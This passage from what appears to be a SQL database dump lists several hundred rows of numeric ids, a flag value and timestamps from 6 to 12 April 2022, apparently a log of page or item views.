19:38:50'),(48843,3752,1,'2022-04-06','2022-04-06 19:43:57'),(48844,1582,1,'2022-04-06','2022-04-06 19:50:11'),(48845,2457,1,'2022-04-06','2022-04-06 19:54:58'),(48846,1544,1,'2022-04-06','2022-04-06 19:59:28'),(48847,3226,1,'2022-04-06','2022-04-06 20:03:59'),(48848,1592,1,'2022-04-06','2022-04-06 20:05:14'),(48849,1600,1,'2022-04-06','2022-04-06 20:06:09'),(48850,3746,1,'2022-04-06','2022-04-06 20:12:08'),(48851,1612,1,'2022-04-06','2022-04-06 20:16:29'),(48852,80,1,'2022-04-06','2022-04-06 20:17:59'),(48853,2989,1,'2022-04-06','2022-04-06 20:22:23'),(48854,3764,1,'2022-04-06','2022-04-06 20:29:03'),(48855,2410,1,'2022-04-06','2022-04-06 20:34:58'),(48856,3060,1,'2022-04-06','2022-04-06 20:40:08'),(48857,1582,1,'2022-04-06','2022-04-06 20:40:40'),(48858,1582,1,'2022-04-06','2022-04-06 20:43:25'),(48859,1604,1,'2022-04-06','2022-04-06 20:46:39'),(48860,469,1,'2022-04-06','2022-04-06 20:54:39'),(48861,1606,1,'2022-04-06','2022-04-06 21:01:11'),(48862,1766,1,'2022-04-06','2022-04-06 21:04:56'),(48863,4341,1,'2022-04-06','2022-04-06 21:06:42'),(48864,1594,1,'2022-04-06','2022-04-06 21:09:05'),(48865,2751,1,'2022-04-06','2022-04-06 21:11:15'),(48866,2309,1,'2022-04-06','2022-04-06 21:15:06'),(48867,1600,1,'2022-04-06','2022-04-06 21:21:20'),(48868,472,1,'2022-04-06','2022-04-06 21:21:56'),(48869,2769,1,'2022-04-06','2022-04-06 21:31:10'),(48870,1612,1,'2022-04-06','2022-04-06 21:31:30'),(48871,1602,1,'2022-04-06','2022-04-06 21:36:10'),(48872,2971,1,'2022-04-06','2022-04-06 21:46:08'),(48873,1596,1,'2022-04-06','2022-04-06 21:57:51'),(48874,335,1,'2022-04-06','2022-04-06 21:58:37'),(48875,3004,1,'2022-04-06','2022-04-06 22:03:26'),(48876,76,1,'2022-04-06','2022-04-06 22:31:15'),(48877,3127,1,'2022-04-06','2022-04-06 22:31:36'),(48878,1747,1,'2022-04-06','2022-04-06 22:49:28'),(48879,3531,1,'2022-04-06','2022-04-06 23:03:58'),(48880,80,1,'2022-04-06','2022-04-06 23:10:34'),(48881,2769,1,'2022-04-06','2022-04-06 23:11:37'),(48882,2748,1,'2022-04-06','2022-04-06 23:27:38'),(48883,80,1,'2022-04-06','2022-04-06 23:39:51'),(48884,74,1,'2022-04-06','2022-04-06 23:47:19'),(48885,1544,1,'2022-04-06','2022-04-06 23:51:59'),(48886,1582,1,'2022-04-06','2022-04-06 23:53:10'),(48887,1544,1,'2022-04-06','2022-04-06 23:54:56'),(48888,3438,1,'2022-04-07','2022-04-07 00:08:41'),(48889,2775,1,'2022-04-07','2022-04-07 00:27:30'),(48890,3263,1,'2022-04-07','2022-04-07 00:47:39'),(48891,2809,1,'2022-04-07','2022-04-07 01:07:24'),(48892,2904,1,'2022-04-07','2022-04-07 01:11:20'),(48893,467,1,'2022-04-07','2022-04-07 01:48:29'),(48894,467,1,'2022-04-07','2022-04-07 02:05:25'),(48895,3534,1,'2022-04-07','2022-04-07 02:12:09'),(48896,1610,1,'2022-04-07','2022-04-07 02:27:19'),(48897,1602,1,'2022-04-07','2022-04-07 02:47:38'),(48898,3764,1,'2022-04-07','2022-04-07 03:08:27'),(48899,3781,1,'2022-04-07','2022-04-07 03:47:20'),(48900,1722,1,'2022-04-07','2022-04-07 04:07:28'),(48901,1701,1,'2022-04-07','2022-04-07 04:27:24'),(48902,1612,1,'2022-04-07','2022-04-07 05:01:54'),(48903,2809,1,'2022-04-07','2022-04-07 05:15:00'),(48904,3263,1,'2022-04-07','2022-04-07 05:28:27'),(48905,2991,1,'2022-04-07','2022-04-07 05:35:34'),(48906,3534,1,'2022-04-07','2022-04-07 05:39:49'),(48907,469,1,'2022-04-07','2022-04-07 05:54:37'),(48908,4335,1,'2022-04-07','2022-04-07 06:13:38'),(48909,3287,1,'2022-04-07','2022-04-07 06:14:06'),(48910,2410,1,'2022-04-07','2022-04-07 06:18:16'),(48911,4335,1,'2022-04-07','2022-04-07 06:18:18'),(48912,482,1,'2022-04-07','2022-04-07 06:22:40'),(48913,1770,1,'2022-04-07','2022-04-07 06:26:55'),(48914,1701,1,'2022-04-07','2022-04-07 07:06:11'),(48915,3045,1,'2022-04-07','2022-04-07 07:24:04'),(48916,2804,1,'2022-04-07','2022-04-07 07:52:36'),(48917,2904,1,'2022-04-07','2022-04-07 08:27:54'),(48918,89,1,'2022-04-07','2022-04-07 08:41:01'),(48919,3664,1,'2022-04-07','2022-04-07 08:47:26'),(48920,3034,1,'2022-04-07','2022-04-07 09:04:37'),(48921,3102,1,'2022-04-07','2022-04-07 09:13:36'),(48922,91,1,'2022-04-07','2022-04-07 09:14:15'),(48923,4556,1,'2022-04-07','2022-04-07 09:15:47'),(48924,4444,1,'2022-04-07','2022-04-07 09:16:24'),(48925,4444,1,'2022-04-07','2022-04-07 09:16:27'),(48926,91,1,'2022-04-07','2022-04-07 09:17:58'),(48927,4520,1,'2022-04-07','2022-04-07 09:18:09'),(48928,4420,1,'2022-04-07','2022-04-07 09:18:42'),(48929,4420,1,'2022-04-07','2022-04-07 09:18:45'),(48930,91,1,'2022-04-07','2022-04-07 09:19:07'),(48931,2309,1,'2022-04-07','2022-04-07 09:25:08'),(48932,2309,1,'2022-04-07','2022-04-07 09:25:20'),(48933,2309,1,'2022-04-07','2022-04-07 09:25:34'),(48934,2309,1,'2022-04-07','2022-04-07 09:25:57'),(48935,91,1,'2022-04-07','2022-04-07 09:26:14'),(48936,1730,1,'2022-04-07','2022-04-07 09:26:55'),(48937,91,1,'2022-04-07','2022-04-07 09:27:06'),(48938,89,1,'2022-04-07','2022-04-07 09:28:16'),(48939,3251,1,'2022-04-07','2022-04-07 09:45:27'),(48940,1600,1,'2022-04-07','2022-04-07 10:07:29'),(48941,1600,1,'2022-04-07','2022-04-07 10:08:12'),(48942,72,1,'2022-04-07','2022-04-07 10:08:38'),(48943,68,1,'2022-04-07','2022-04-07 10:08:50'),(48944,72,1,'2022-04-07','2022-04-07 10:08:56'),(48945,1600,1,'2022-04-07','2022-04-07 10:08:59'),(48946,3247,1,'2022-04-07','2022-04-07 12:09:49'),(48947,1582,1,'2022-04-07','2022-04-07 12:16:55'),(48948,3764,1,'2022-04-07','2022-04-07 12:24:59'),(48949,2419,1,'2022-04-07','2022-04-07 12:54:23'),(48950,470,1,'2022-04-07','2022-04-07 13:24:11'),(48951,1582,1,'2022-04-07','2022-04-07 13:41:08'),(48952,1582,1,'2022-04-07','2022-04-07 13:44:19'),(48953,1749,1,'2022-04-07','2022-04-07 13:54:00'),(48954,91,1,'2022-04-07','2022-04-07 14:59:20'),(48955,4396,1,'2022-04-07','2022-04-07 15:00:46'),(48956,4396,1,'2022-04-07','2022-04-07 15:00:48'),(48957,91,1,'2022-04-07','2022-04-07 15:01:54'),(48958,1770,1,'2022-04-07','2022-04-07 15:13:57'),(48959,3045,1,'2022-04-07','2022-04-07 15:29:13'),(48960,3771,1,'2022-04-07','2022-04-07 15:53:05'),(48961,1586,1,'2022-04-07','2022-04-07 16:04:27'),(48962,3781,1,'2022-04-07','2022-04-07 16:06:33'),(48963,3278,1,'2022-04-07','2022-04-07 16:09:06'),(48964,1770,1,'2022-04-07','2022-04-07 16:21:51'),(48965,3069,1,'2022-04-07','2022-04-07 16:37:18'),(48966,1751,1,'2022-04-07','2022-04-07 16:52:57'),(48967,467,1,'2022-04-07','2022-04-07 17:27:26'),(48968,1594,1,'2022-04-07','2022-04-07 17:36:52'),(48969,1596,1,'2022-04-07','2022-04-07 17:38:56'),(48970,1596,1,'2022-04-07','2022-04-07 17:39:47'),(48971,4457,1,'2022-04-07','2022-04-07 17:47:28'),(48972,3752,1,'2022-04-07','2022-04-07 17:51:33'),(48973,4412,1,'2022-04-07','2022-04-07 17:58:03'),(48974,3746,1,'2022-04-07','2022-04-07 18:06:41'),(48975,3781,1,'2022-04-07','2022-04-07 18:56:04'),(48976,1588,1,'2022-04-07','2022-04-07 19:30:39'),(48977,80,1,'2022-04-07','2022-04-07 20:23:30'),(48978,3030,1,'2022-04-07','2022-04-07 20:44:18'),(48979,2775,1,'2022-04-07','2022-04-07 21:12:22'),(48980,3764,1,'2022-04-08','2022-04-08 01:09:58'),(48981,1594,1,'2022-04-08','2022-04-08 01:36:49'),(48982,2558,1,'2022-04-08','2022-04-08 02:05:35'),(48983,68,1,'2022-04-08','2022-04-08 03:09:57'),(48984,3479,1,'2022-04-08','2022-04-08 03:23:19'),(48985,3479,1,'2022-04-08','2022-04-08 03:53:08'),(48986,3764,1,'2022-04-08','2022-04-08 04:49:10'),(48987,3705,1,'2022-04-08','2022-04-08 05:18:26'),(48988,1586,1,'2022-04-08','2022-04-08 06:05:37'),(48989,1586,1,'2022-04-08','2022-04-08 06:11:48'),(48990,1778,1,'2022-04-08','2022-04-08 06:13:48'),(48991,1588,1,'2022-04-08','2022-04-08 06:44:15'),(48992,2964,1,'2022-04-08','2022-04-08 07:38:04'),(48993,1592,1,'2022-04-08','2022-04-08 09:11:37'),(48994,91,1,'2022-04-08','2022-04-08 11:08:29'),(48995,4542,1,'2022-04-08','2022-04-08 11:13:09'),(48996,3290,1,'2022-04-08','2022-04-08 13:01:49'),(48997,3251,1,'2022-04-08','2022-04-08 13:26:40'),(48998,1598,1,'2022-04-08','2022-04-08 14:00:56'),(48999,470,1,'2022-04-08','2022-04-08 14:15:00'),(49000,1586,1,'2022-04-08','2022-04-08 14:47:28'),(49001,4520,1,'2022-04-08','2022-04-08 15:00:01'),(49002,1588,1,'2022-04-08','2022-04-08 15:18:49'),(49003,1586,1,'2022-04-08','2022-04-08 16:19:08'),(49004,68,1,'2022-04-08','2022-04-08 16:25:03'),(49005,1586,1,'2022-04-08','2022-04-08 16:26:47'),(49006,1778,1,'2022-04-08','2022-04-08 16:28:54'),(49007,1586,1,'2022-04-08','2022-04-08 16:32:06'),(49008,1778,1,'2022-04-08','2022-04-08 17:40:21'),(49009,3764,1,'2022-04-08','2022-04-08 18:00:37'),(49010,470,1,'2022-04-08','2022-04-08 18:40:33'),(49011,4457,1,'2022-04-08','2022-04-08 19:08:52'),(49012,4275,1,'2022-04-08','2022-04-08 19:44:54'),(49013,3694,1,'2022-04-08','2022-04-08 19:59:51'),(49014,4275,1,'2022-04-08','2022-04-08 20:20:07'),(49015,3297,1,'2022-04-08','2022-04-08 20:39:51'),(49016,1600,1,'2022-04-08','2022-04-08 21:25:04'),(49017,1594,1,'2022-04-08','2022-04-08 21:29:24'),(49018,3030,1,'2022-04-08','2022-04-08 22:32:16'),(49019,2395,1,'2022-04-08','2022-04-08 22:46:22'),(49020,470,1,'2022-04-08','2022-04-08 22:54:51'),(49021,570,1,'2022-04-08','2022-04-08 23:23:27'),(49022,570,1,'2022-04-08','2022-04-08 23:25:32'),(49023,4566,1,'2022-04-08','2022-04-08 23:39:54'),(49024,3752,1,'2022-04-08','2022-04-08 23:54:56'),(49025,91,1,'2022-04-09','2022-04-09 00:07:36'),(49026,4546,1,'2022-04-09','2022-04-09 00:07:59'),(49027,4546,1,'2022-04-09','2022-04-09 00:08:01'),(49028,76,1,'2022-04-09','2022-04-09 00:09:01'),(49029,1741,1,'2022-04-09','2022-04-09 00:09:53'),(49030,4582,1,'2022-04-09','2022-04-09 00:24:53'),(49031,91,1,'2022-04-09','2022-04-09 00:35:01'),(49032,4587,1,'2022-04-09','2022-04-09 00:35:11'),(49033,4587,1,'2022-04-09','2022-04-09 00:35:12'),(49034,91,1,'2022-04-09','2022-04-09 00:37:54'),(49035,4556,1,'2022-04-09','2022-04-09 00:38:11'),(49036,4556,1,'2022-04-09','2022-04-09 00:38:12'),(49037,3746,1,'2022-04-09','2022-04-09 00:39:55'),(49038,91,1,'2022-04-09','2022-04-09 00:40:19'),(49039,4457,1,'2022-04-09','2022-04-09 00:56:57'),(49040,0,1,'2022-04-09','2022-04-09 01:09:33'),(49041,1711,1,'2022-04-09','2022-04-09 01:11:10'),(49042,2395,1,'2022-04-09','2022-04-09 03:09:50'),(49043,479,1,'2022-04-09','2022-04-09 05:56:51'),(49044,4566,1,'2022-04-09','2022-04-09 06:11:50'),(49045,2457,1,'2022-04-09','2022-04-09 06:39:04'),(49046,1780,1,'2022-04-09','2022-04-09 06:56:52'),(49047,482,1,'2022-04-09','2022-04-09 08:07:22'),(49048,4323,1,'2022-04-09','2022-04-09 11:23:35'),(49049,1544,1,'2022-04-09','2022-04-09 11:38:16'),(49050,4566,1,'2022-04-09','2022-04-09 12:23:35'),(49051,3498,1,'2022-04-09','2022-04-09 13:23:34'),(49052,87,1,'2022-04-09','2022-04-09 13:29:38'),(49053,483,1,'2022-04-09','2022-04-09 13:30:09'),(49054,1588,1,'2022-04-09','2022-04-09 13:57:23'),(49055,1604,1,'2022-04-09','2022-04-09 13:59:33'),(49056,3056,1,'2022-04-09','2022-04-09 14:01:24'),(49057,1604,1,'2022-04-09','2022-04-09 14:05:23'),(49058,1722,1,'2022-04-09','2022-04-09 15:33:52'),(49059,482,1,'2022-04-09','2022-04-09 16:24:00'),(49060,488,1,'2022-04-09','2022-04-09 16:27:17'),(49061,1614,1,'2022-04-09','2022-04-09 18:08:08'),(49062,0,1,'2022-04-09','2022-04-09 19:09:08'),(49063,1544,1,'2022-04-09','2022-04-09 19:15:01'),(49064,4566,1,'2022-04-09','2022-04-09 19:48:37'),(49065,4420,1,'2022-04-09','2022-04-09 19:53:29'),(49066,4323,1,'2022-04-09','2022-04-09 21:38:39'),(49067,4566,1,'2022-04-09','2022-04-09 21:53:27'),(49068,4566,1,'2022-04-09','2022-04-09 22:08:41'),(49069,4412,1,'2022-04-09','2022-04-09 22:39:35'),(49070,3498,1,'2022-04-09','2022-04-09 22:53:27'),(49071,4412,1,'2022-04-09','2022-04-09 23:08:28'),(49072,479,1,'2022-04-09','2022-04-09 23:23:41'),(49073,1600,1,'2022-04-09','2022-04-09 23:40:01'),(49074,4436,1,'2022-04-10','2022-04-10 00:23:27'),(49075,3752,1,'2022-04-10','2022-04-10 00:53:48'),(49076,3752,1,'2022-04-10','2022-04-10 00:56:15'),(49077,1602,1,'2022-04-10','2022-04-10 01:59:55'),(49078,1870,1,'2022-04-10','2022-04-10 02:08:27'),(49079,3710,1,'2022-04-10','2022-04-10 05:10:03'),(49080,1600,1,'2022-04-10','2022-04-10 09:30:33'),(49081,4566,1,'2022-04-10','2022-04-10 09:47:18'),(49082,1606,1,'2022-04-10','2022-04-10 10:00:41'),(49083,3069,1,'2022-04-10','2022-04-10 10:15:45'),(49084,470,1,'2022-04-10','2022-04-10 10:30:28'),(49085,1586,1,'2022-04-10','2022-04-10 10:50:04'),(49086,1582,1,'2022-04-10','2022-04-10 11:00:51'),(49087,1600,1,'2022-04-10','2022-04-10 11:52:07'),(49088,2178,1,'2022-04-10','2022-04-10 13:17:52'),(49089,4412,1,'2022-04-10','2022-04-10 14:09:20'),(49090,1602,1,'2022-04-10','2022-04-10 14:28:20'),(49091,3079,1,'2022-04-10','2022-04-10 15:23:03'),(49092,470,1,'2022-04-10','2022-04-10 15:36:30'),(49093,1877,1,'2022-04-10','2022-04-10 15:37:06'),(49094,3069,1,'2022-04-10','2022-04-10 15:57:12'),(49095,1582,1,'2022-04-10','2022-04-10 15:57:35'),(49096,3069,1,'2022-04-10','2022-04-10 16:00:25'),(49097,3710,1,'2022-04-10','2022-04-10 16:34:01'),(49098,3004,1,'2022-04-10','2022-04-10 17:22:08'),(49099,2609,1,'2022-04-10','2022-04-10 17:46:50'),(49100,2609,1,'2022-04-10','2022-04-10 17:47:54'),(49101,2609,1,'2022-04-10','2022-04-10 17:49:27'),(49102,2609,1,'2022-04-10','2022-04-10 17:56:39'),(49103,1586,1,'2022-04-10','2022-04-10 18:00:32'),(49104,1586,1,'2022-04-10','2022-04-10 18:00:33'),(49105,2609,1,'2022-04-10','2022-04-10 18:02:26'),(49106,2609,1,'2022-04-10','2022-04-10 18:04:16'),(49107,91,1,'2022-04-10','2022-04-10 18:04:44'),(49108,4591,1,'2022-04-10','2022-04-10 18:05:11'),(49109,4591,1,'2022-04-10','2022-04-10 18:05:13'),(49110,91,1,'2022-04-10','2022-04-10 18:06:55'),(49111,4542,1,'2022-04-10','2022-04-10 18:07:17'),(49112,4556,1,'2022-04-10','2022-04-10 18:08:00'),(49113,4556,1,'2022-04-10','2022-04-10 18:08:03'),(49114,91,1,'2022-04-10','2022-04-10 18:09:34'),(49115,2609,1,'2022-04-10','2022-04-10 18:09:57'),(49116,1600,1,'2022-04-10','2022-04-10 18:57:05'),(49117,1600,1,'2022-04-10','2022-04-10 19:14:20'),(49118,2769,1,'2022-04-10','2022-04-10 19:54:54'),(49119,3069,1,'2022-04-10','2022-04-10 19:57:05'),(49120,2769,1,'2022-04-10','2022-04-10 19:57:54'),(49121,1610,1,'2022-04-10','2022-04-10 20:26:18'),(49122,2609,1,'2022-04-10','2022-04-10 20:53:49'),(49123,1586,1,'2022-04-10','2022-04-10 21:30:26'),(49124,1596,1,'2022-04-10','2022-04-10 21:42:57'),(49125,4338,1,'2022-04-10','2022-04-10 22:57:39'),(49126,480,1,'2022-04-10','2022-04-10 23:02:30'),(49127,478,1,'2022-04-11','2022-04-11 02:10:50'),(49128,3710,1,'2022-04-11','2022-04-11 02:24:32'),(49129,1606,1,'2022-04-11','2022-04-11 02:55:40'),(49130,4448,1,'2022-04-11','2022-04-11 05:29:51'),(49131,1612,1,'2022-04-11','2022-04-11 06:26:17'),(49132,1602,1,'2022-04-11','2022-04-11 06:30:55'),(49133,91,1,'2022-04-11','2022-04-11 06:32:28'),(49134,2503,1,'2022-04-11','2022-04-11 06:33:16'),(49135,80,1,'2022-04-11','2022-04-11 06:34:30'),(49136,2410,1,'2022-04-11','2022-04-11 07:25:09'),(49137,2410,1,'2022-04-11','2022-04-11 07:55:11'),(49138,1734,1,'2022-04-11','2022-04-11 07:55:59'),(49139,1614,1,'2022-04-11','2022-04-11 08:27:56'),(49140,1588,1,'2022-04-11','2022-04-11 08:55:04'),(49141,1544,1,'2022-04-11','2022-04-11 09:07:43'),(49142,1544,1,'2022-04-11','2022-04-11 09:56:13'),(49143,76,1,'2022-04-11','2022-04-11 09:57:42'),(49144,1544,1,'2022-04-11','2022-04-11 10:00:13'),(49145,87,1,'2022-04-11','2022-04-11 10:03:40'),(49146,4387,1,'2022-04-11','2022-04-11 10:08:54'),(49147,1612,1,'2022-04-11','2022-04-11 10:11:15'),(49148,473,1,'2022-04-11','2022-04-11 10:11:56'),(49149,2775,1,'2022-04-11','2022-04-11 10:15:14'),(49150,84,1,'2022-04-11','2022-04-11 10:17:22'),(49151,1870,1,'2022-04-11','2022-04-11 10:18:05'),(49152,1544,1,'2022-04-11','2022-04-11 10:41:40'),(49153,1588,1,'2022-04-11','2022-04-11 10:51:39'),(49154,3675,1,'2022-04-11','2022-04-11 11:21:02'),(49155,2457,1,'2022-04-11','2022-04-11 11:26:12'),(49156,4400,1,'2022-04-11','2022-04-11 11:44:33'),(49157,3249,1,'2022-04-11','2022-04-11 11:52:18'),(49158,4448,1,'2022-04-11','2022-04-11 11:55:28'),(49159,1588,1,'2022-04-11','2022-04-11 12:25:00'),(49160,72,1,'2022-04-11','2022-04-11 12:25:35'),(49161,72,1,'2022-04-11','2022-04-11 12:26:38'),(49162,89,1,'2022-04-11','2022-04-11 12:27:05'),(49163,89,1,'2022-04-11','2022-04-11 12:27:30'),(49164,3249,1,'2022-04-11','2022-04-11 12:27:46'),(49165,89,1,'2022-04-11','2022-04-11 12:28:27'),(49166,1592,1,'2022-04-11','2022-04-11 12:28:54'),(49167,89,1,'2022-04-11','2022-04-11 12:28:59'),(49168,1608,1,'2022-04-11','2022-04-11 12:29:27'),(49169,89,1,'2022-04-11','2022-04-11 12:30:42'),(49170,1600,1,'2022-04-11','2022-04-11 12:30:52'),(49171,3245,1,'2022-04-11','2022-04-11 12:40:44'),(49172,4396,1,'2022-04-11','2022-04-11 12:40:51'),(49173,2178,1,'2022-04-11','2022-04-11 12:42:58'),(49174,2457,1,'2022-04-11','2022-04-11 12:48:01'),(49175,74,1,'2022-04-11','2022-04-11 12:50:12'),(49176,2503,1,'2022-04-11','2022-04-11 13:04:44'),(49177,4396,1,'2022-04-11','2022-04-11 13:28:58'),(49178,3710,1,'2022-04-11','2022-04-11 14:25:51'),(49179,80,1,'2022-04-11','2022-04-11 15:03:49'),(49180,80,1,'2022-04-11','2022-04-11 15:04:40'),(49181,570,1,'2022-04-11','2022-04-11 15:16:20'),(49182,1544,1,'2022-04-11','2022-04-11 15:52:45'),(49183,1544,1,'2022-04-11','2022-04-11 15:54:47'),(49184,1544,1,'2022-04-11','2022-04-11 15:56:08'),(49185,1728,1,'2022-04-11','2022-04-11 15:58:37'),(49186,1728,1,'2022-04-11','2022-04-11 15:58:53'),(49187,1602,1,'2022-04-11','2022-04-11 16:01:09'),(49188,2704,1,'2022-04-11','2022-04-11 16:01:23'),(49189,80,1,'2022-04-11','2022-04-11 16:01:56'),(49190,2395,1,'2022-04-11','2022-04-11 16:02:07'),(49191,1596,1,'2022-04-11','2022-04-11 16:44:10'),(49192,1596,1,'2022-04-11','2022-04-11 16:44:17'),(49193,1596,1,'2022-04-11','2022-04-11 16:44:22'),(49194,3675,1,'2022-04-11','2022-04-11 17:51:45'),(49195,1600,1,'2022-04-11','2022-04-11 18:20:27'),(49196,4400,1,'2022-04-11','2022-04-11 18:21:47'),(49197,3245,1,'2022-04-11','2022-04-11 18:54:13'),(49198,3259,1,'2022-04-11','2022-04-11 19:25:48'),(49199,76,1,'2022-04-11','2022-04-11 19:52:43'),(49200,3275,1,'2022-04-11','2022-04-11 20:26:15'),(49201,1602,1,'2022-04-11','2022-04-11 20:34:06'),(49202,1602,1,'2022-04-11','2022-04-11 20:42:53'),(49203,72,1,'2022-04-11','2022-04-11 21:06:18'),(49204,1877,1,'2022-04-11','2022-04-11 21:26:08'),(49205,3710,1,'2022-04-11','2022-04-11 21:26:25'),(49206,1588,1,'2022-04-11','2022-04-11 21:38:17'),(49207,1596,1,'2022-04-11','2022-04-11 21:39:15'),(49208,570,1,'2022-04-11','2022-04-11 22:03:14'),(49209,4420,1,'2022-04-11','2022-04-11 22:59:21'),(49210,487,1,'2022-04-12','2022-04-12 00:18:11'),(49211,3030,1,'2022-04-12','2022-04-12 00:25:59'),(49212,2748,1,'2022-04-12','2022-04-12 01:01:47'),(49213,80,1,'2022-04-12','2022-04-12 02:25:16'),(49214,1600,1,'2022-04-12','2022-04-12 02:50:46'),(49215,1782,1,'2022-04-12','2022-04-12 03:24:51'),(49216,4440,1,'2022-04-12','2022-04-12 04:25:50'),(49217,4404,1,'2022-04-12','2022-04-12 05:24:30'),(49218,1582,1,'2022-04-12','2022-04-12 05:25:32'),(49219,1586,1,'2022-04-12','2022-04-12 06:07:13'),(49220,1586,1,'2022-04-12','2022-04-12 06:07:15'),(49221,4416,1,'2022-04-12','2022-04-12 06:29:47'),(49222,3710,1,'2022-04-12','2022-04-12 08:16:29'),(49223,4391,1,'2022-04-12','2022-04-12 08:55:53'),(49224,80,1,'2022-04-12','2022-04-12 08:56:04'),(49225,80,1,'2022-04-12','2022-04-12 08:57:49'),(49226,4391,1,'2022-04-12','2022-04-12 08:57:52'),(49227,91,1,'2022-04-12','2022-04-12 08:58:09'),(49228,91,1,'2022-04-12','2022-04-12 08:58:36'),(49229,4448,1,'2022-04-12','2022-04-12 08:58:46'),(49230,4448,1,'2022-04-12','2022-04-12 08:58:48'),(49231,91,1,'2022-04-12','2022-04-12 09:00:57'),(49232,3226,1,'2022-04-12','2022-04-12 09:45:26'),(49233,91,1,'2022-04-12','2022-04-12 09:48:25'),(49234,3226,1,'2022-04-12','2022-04-12 09:48:40'),(49235,3226,1,'2022-04-12','2022-04-12 09:51:37'),(49236,1602,1,'2022-04-12','2022-04-12 10:14:48'),(49237,1602,1,'2022-04-12','2022-04-12 10:14:48'),(49238,1602,1,'2022-04-12','2022-04-12 10:15:00'),(49239,3788,1,'2022-04-12','2022-04-12 11:32:55'),(49240,2813,1,'2022-04-12','2022-04-12 11:44:32'),(49241,1598,1,'2022-04-12','2022-04-12 12:15:55'),(49242,68,1,'2022-04-12','2022-04-12 12:26:34'),(49243,72,1,'2022-04-12','2022-04-12 12:29:12'),(49244,72,1,'2022-04-12','2022-04-12 12:30:33'),(49245,72,1,'2022-04-12','2022-04-12 12:32:05'),(49246,72,1,'2022-04-12','2022-04-12 12:32:53'),(49247,3788,1,'2022-04-12','2022-04-12 12:33:01'),(49248,1602,1,'2022-04-12','2022-04-12 12:53:59'),(49249,1728,1,'2022-04-12','2022-04-12 12:56:43'),(49250,1728,1,'2022-04-12','2022-04-12 12:57:05'),(49251,1728,1,'2022-04-12','2022-04-12 12:57:25'),(49252,1728,1,'2022-04-12','2022-04-12 12:57:53'),(49253,469,1,'2022-04-12','2022-04-12 13:00:22'),(49254,87,1,'2022-04-12','2022-04-12 13:08:19'),(49255,1600,1,'2022-04-12','2022-04-12 13:16:22'),(49256,486,1,'2022-04-12','2022-04-12 13:24:56'),(49257,481,1,'2022-04-12','2022-04-12 13:29:06'),(49258,486,1,'2022-04-12','2022-04-12 13:30:01'),(49259,570,1,'2022-04-12','2022-04-12 13:31:43'),(49260,2159,1,'2022-04-12','2022-04-12 13:33:01'),(49261,1778,1,'2022-04-12','2022-04-12 13:45:51'),(49262,1602,1,'2022-04-12','2022-04-12 13:49:49'),(49263,3104,1,'2022-04-12','2022-04-12 13:59:36'),(49264,1713,1,'2022-04-12','2022-04-12 14:28:38'),(49265,3127,1,'2022-04-12','2022-04-12 14:44:22'),(49266,1722,1,'2022-04-12','2022-04-12 14:52:32'),(49267,3127,1,'2022-04-12','2022-04-12 14:59:52'),(49268,2297,1,'2022-04-12','2022-04-12 15:12:04'),(49269,3267,1,'2022-04-12','2022-04-12 15:16:49'),(49270,3267,1,'2022-04-12','2022-04-12 15:28:17'),(49271,3752,1,'2022-04-12','2022-04-12 15:29:10'),(49272,4448,1,'2022-04-12','2022-04-12 15:31:23'),(49273,4582,1,'2022-04-12','2022-04-12 15:36:27'),(49274,479,1,'2022-04-12','2022-04-12 15:42:13'),(49275,3746,1,'2022-04-12','2022-04-12 15:44:03'),(49276,1741,1,'2022-04-12','2022-04-12 15:47:24'),(49277,481,1,'2022-04-12','2022-04-12 15:51:09'),(49278,3691,1,'2022-04-12','2022-04-12 15:58:39'),(49279,4492,1,'2022-04-12','2022-04-12 16:09:55'),(49280,2150,1,'2022-04-12','2022-04-12 16:11:41'),(49281,3072,1,'2022-04-12','2022-04-12 16:12:16'),(49282,2775,1,'2022-04-12','2022-04-12 16:15:04'),(49283,2154,1,'2022-04-12','2022-04-12 16:21:09'),(49284,4373,1,'2022-04-12','2022-04-12 16:24:19'),(49285,2063,1,'2022-04-12','2022-04-12 16:27:44'),(49286,474,1,'2022-04-12','2022-04-12 16:32:49'),(49287,76,1,'2022-04-12','2022-04-12 16:32:56'),(49288,68,1,'2022-04-12','2022-04-12 16:33:45'),(49289,76,1,'2022-04-12','2022-04-12 16:35:26'),(49290,87,1,'2022-04-12','2022-04-12 16:35:43'),(49291,3243,1,'2022-04-12','2022-04-12 16:36:10'),(49292,2154,1,'2022-04-12','2022-04-12 16:39:54'),(49293,4348,1,'2022-04-12','2022-04-12 16:47:23'),(49294,480,1,'2022-04-12','2022-04-12 16:49:06'),(49295,2775,1,'2022-04-12','2022-04-12 16:51:08'),(49296,1602,1,'2022-04-12','2022-04-12 16:56:22'),(49297,3781,1,'2022-04-12','2022-04-12 16:58:38'),(49298,2971,1,'2022-04-12','2022-04-12 16:59:22'),(49299,2989,1,'2022-04-12','2022-04-12 17:06:09'),(49300,473,1,'2022-04-12','2022-04-12 17:11:43'),(49301,3777,1,'2022-04-12','2022-04-12 17:18:48'),(49302,1872,1,'2022-04-12','2022-04-12 17:25:28'),(49303,1737,1,'2022-04-12','2022-04-12 18:01:04'),(49304,3534,1,'2022-04-12','2022-04-12 18:01:25'),(49305,4524,1,'2022-04-12','2022-04-12 18:08:56'),(49306,1544,1,'2022-04-12','2022-04-12 18:13:50'),(49307,3691,1,'2022-04-12','2022-04-12 18:23:49'),(49308,1877,1,'2022-04-12','2022-04-12 18:30:23'),(49309,4514,1,'2022-04-12','2022-04-12 18:46:24'),(49310,3027,1,'2022-04-12','2022-04-12 18:47:50'),(49311,1588,1,'2022-04-12','2022-04-12 18:54:24'),(49312,1588,1,'2022-04-12','2022-04-12 18:54:40'),(49313,1588,1,'2022-04-12','2022-04-12 18:58:16'),(49314,1600,1,'2022-04-12','2022-04-12 19:07:47'),(49315,1598,1,'2022-04-12','2022-04-12 19:22:44'),(49316,3738,1,'2022-04-12','2022-04-12 19:26:38'),(49317,4420,1,'2022-04-12','2022-04-12 19:41:25'),(49318,4420,1,'2022-04-12','2022-04-12 19:41:26'),(49319,4416,1,'2022-04-12','2022-04-12 19:44:42'),(49320,1600,1,'2022-04-12','2022-04-12 19:45:58'),(49321,3746,1,'2022-04-12','2022-04-12 19:52:59'),(49322,1588,1,'2022-04-12','2022-04-12 20:05:23'),(49323,1588,1,'2022-04-12','2022-04-12 20:05:25'),(49324,1588,1,'2022-04-12','2022-04-12 20:05:59'),(49325,1588,1,'2022-04-12','2022-04-12 20:07:02'),(49326,1588,1,'2022-04-12','2022-04-12 20:11:31'),(49327,3771,1,'2022-04-12','2022-04-12 20:14:31'),(49328,3060,1,'2022-04-12','2022-04-12 20:35:15'),(49329,4326,1,'2022-04-12','2022-04-12 